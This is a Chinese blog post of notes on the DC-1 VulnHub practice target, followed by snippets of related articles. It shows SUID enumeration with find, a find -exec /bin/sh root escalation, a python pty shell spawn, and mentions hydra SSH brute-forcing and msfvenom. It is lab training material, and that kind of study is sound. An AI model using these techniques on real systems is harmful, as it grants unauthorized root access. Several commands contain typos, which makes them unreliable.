靶场DC1过程总结

最新推荐文章于 2024-09-26 11:43:20 发布
最新推荐文章于 2024-09-26 11:43:20 发布
阅读量50 收藏
点赞数
文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57774303/article/details/134846718
版权
本文介绍了如何通过SUID权限提升到root用户,包括使用find命令查找具有SUID的文件和Python脚本的提权方法。同时讨论了反弹shell的概念以及连接数据库时遇到的加密问题,涉及PHP框架的应用。
摘要由CSDN通过智能技术生成

find获得权限的笔记

SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。

使用find命令查看拥有suid权限的文件

find / -user root -perm -4000-exec ls -ldb {} \;
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/del/null

按照刚刚学的

find text.sh -exec "/bin/sh" \;

所以这里的提权语句是   find / -name corn.php -exec "/bin/sh"\是找到名字为 corn.php的文件然后获取他的root权限

root用户是指唯一的超级用户

什么是反弹shell 反弹shell就是主机主动连接攻击机发送信息

sudo python -c 'import pty;pty.spawn("/bin/bash")'

这是python提权的常见姿势

成功

连接数据库

其实已经连接到use的数据库了 只是还是显示mysql

输入 showtables;

用户被加密

用的是php框架

曼达洛战士
关注
渗透测试初体验:DC-1靶场
SmileAssassn的博客
08-07 490
渗透测试靶场DC:1,新手练习使用
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC1靶场练习记录
Andytoe的博客
03-05 178
Vulnhub系列靶场攻略,第一期DC-1
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1720
DC靶场实战过程
DC-1靶场机渗透测试总结与全流程思路+后期复盘
m0_74220316的博客
11-20 593
在此靶场中,使用了metaspolit的基础操作,但是并未涉及到木马生成与上传然后getshell,然后我们获取到了CMS的关键配置文件,然后对靶机中的passwdCMS的信息搜集与利用,漏洞披露,关键配置文件目标上存在的用户信息,用户权限详情网站的后台管理页面探测,网站密码的生成策略数据库入侵的操作,对于加密密码的处理对于当前用户的权限提升(非root)
DC-9靶场下载及渗透实战详细过程(DC靶场系列)
金 帛的博客
08-09 4927
dc-9靶场详细渗透过程
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1091
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1234
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3609
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
DC1靶场练习
qq_60848021的博客
04-08 439
大概意思就是查找passwd文件来找寻flag4文件,但是前面我们已经提权成功利用find命令找到了flag4文件,所以现在直接查看就行。思路:现在我们可以登录进来数据库,可以采用替换的方式,找到靶机的加密算法,将我们设定的密码转换成哈希密码,替换users表中的密码。已经查找到了用户名和密码,但是密码已经被加密了,采用的是哈希密码,破解难度比较大。搜索到drupal7的配置文件是settings.php ,查找该文件。开放端口:22,80,111,36890.三,漏洞利用(获取webshell)
DC靶机渗透系列(DC1-DC3)
居上
07-01 762
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
Linux —— 网络基础(一)
学习C++的小陈同学
09-22 976
本篇只是简单的建立一个关于网络的基本概念和框架,有很多概念上不太完整,只是自己为了自己在初入学习网络时的简单粗俗理解,方便后续深入的学习网络相关的知识,如果有需要纠错的地方,可以评论一起讨论。
Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 591
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
书生大模型实战(从入门到进阶)L0-Linux
m0_73672030的博客
09-22 969
本文是对书生大模型L0-Linux部分的学习和实现
Linux:共享内存】
2201_75755162的博客
09-19 646
共享内存不随着进程的结束就释放,因为共享内存不属于进程而属于操作系统,需要手动释放或者后续其它系统调用。共享内存的生命周期随内核。
[Linux] Linux进程PCB内部信息的深入理解
水墨不写bug
09-21 1163
[Linux] Linux进程PCB内部信息的深入理解: 一.查看进程 二.认识并了解进程的关键信息 I,PID/PPID II,exe III,cwd 三、fork()创建进程
Linux下Ssh互信过程记录
最新发布
冰之杍的博客
09-26 86
Linux下SSH互信过程记录
dc1靶机渗透测试获取flag过程需用到searchsploit drupal
09-10
DC1靶机的Drupal渗透测试任务中,当你遇到涉及searchsploit和Drupal的情况,通常是在寻找利用Drupal漏洞的payload或exploit套件。Drupal是一个流行的开源内容管理系统,searchsploit是Metasploit Framework中的一个工具,它用于搜索和查找与已知漏洞匹配的exploits。 以下是获取flag过程的一般步骤: 1. **识别漏洞**:首先需要确定目标 Drupal 网站存在哪些已公开的漏洞,比如searchsploit中可能会列出与Drupal相关的CVE编号。 ```sh searchsploit -r drupal ``` 2. **分析exploit**:找到相关的exploit后,查看其描述、要求以及如何使用,确认是否适用于目标环境。 3. **准备payload**:根据exploit的要求,选择适合的目标架构(如x86、x64等)生成payload。例如: ```sh msfvenom -f raw > payload ``` 4. **上传payload**:通过webshell或利用drupal的某些功能(如文件上传)将payload上传到服务器上。 5. **触发漏洞**:在目标网站上触发导致RCE(Remote Code Execution)的漏洞,这可能涉及到访问特定URL或提交特定的数据结构。 6. **执行命令**:一旦payload被执行,可以利用命令提示符执行系统命令,包括搜索flag文件。 7. **提取flag**:定位并下载包含flag的文件,通常flag会以某种加密或编码形式存在。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值